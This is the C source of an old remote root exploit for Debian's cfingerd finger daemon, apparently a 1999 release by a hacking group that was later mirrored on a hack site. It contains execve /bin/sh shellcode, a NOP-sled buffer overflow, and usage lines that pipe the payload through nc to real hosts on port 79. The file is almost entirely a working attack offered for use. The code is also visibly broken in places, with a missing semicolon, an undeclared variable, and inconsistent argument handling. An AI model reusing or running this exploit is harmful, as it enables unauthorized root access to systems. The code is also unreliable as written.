/*
            - Imperfection Security Presents -     
         
       Debian GNU/Linux cfingerd remote root exploit
       From shakey, of Imperfection Security [07/99]
 
   Exploits a problem reported on BUGTRAQ in Debian's
   cfingerd. This exploit is remotely exploitable, and
   leaves the attacker a root shell on vulnerable systems.
   However, this attack is less susceptible to mass-probing
   from script kiddies due to the lack of a banner from the
   finger service ;D
 
   Affected Systems:
	+ Debian Linux 2.0r5, 2.0, 1.3.1, 1.3, 1.2
 
   Greetings: dave, unknown, syntax, naptime, jaz, blitzed
              t0m, insane, DSC, short, vicci, crime, SDI
              ( nice shellcode generator ), phewl,  
              phenom, punish, kindred, tom-, justin
              
   Usage:
     IS-finger [offset]
     Example:	(./IS-finger 0; cat) | nc linux.org 79
*/

#include <stdio.h>

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
  "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
  "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
  "\xff\xff/bin/sh"

  main (int argc, char *argv[])
  {
    char buf[2500];
    int x,y=1000, offset=0;
    long addr;
    int bsize=986;

    if ( argc > 1)
      {
        printf ( "Imperfection Securities\' cfingerd exploit.");
        printf ( "Usage: (./IS-finger [offset]; cat) | nc debian.org 79\n");
        exit (0);
      }

    if ( argc > 0) offset = atoi (argv[1]);

    addr = 0xbffff3c0 + offset;

    bsize -= strlen ( host);

    for ( x = 0; x < bsize-strlen(shellcode); x++)
      buf[x] = 0x90;

    for ( y = 0; y < strlen(shellcode); x++, y++)
      buf[x] = shellcode[y];

    for ( ; x < 72; x+=4)
      {
        buf[x  ] = addr & 0x000000ff;
        buf[x+1] = (addr & 0x0000ff00) >> 8;
        buf[x+2] = (addr & 0x00ff0000) >> 16;
        buf[x+3] = (addr & 0xff000000) >> 24;
      }

    sleep (1);
    printf ( "%s\r\n", buf);
  }
  /*                    www.hack.co.za              [2000]*/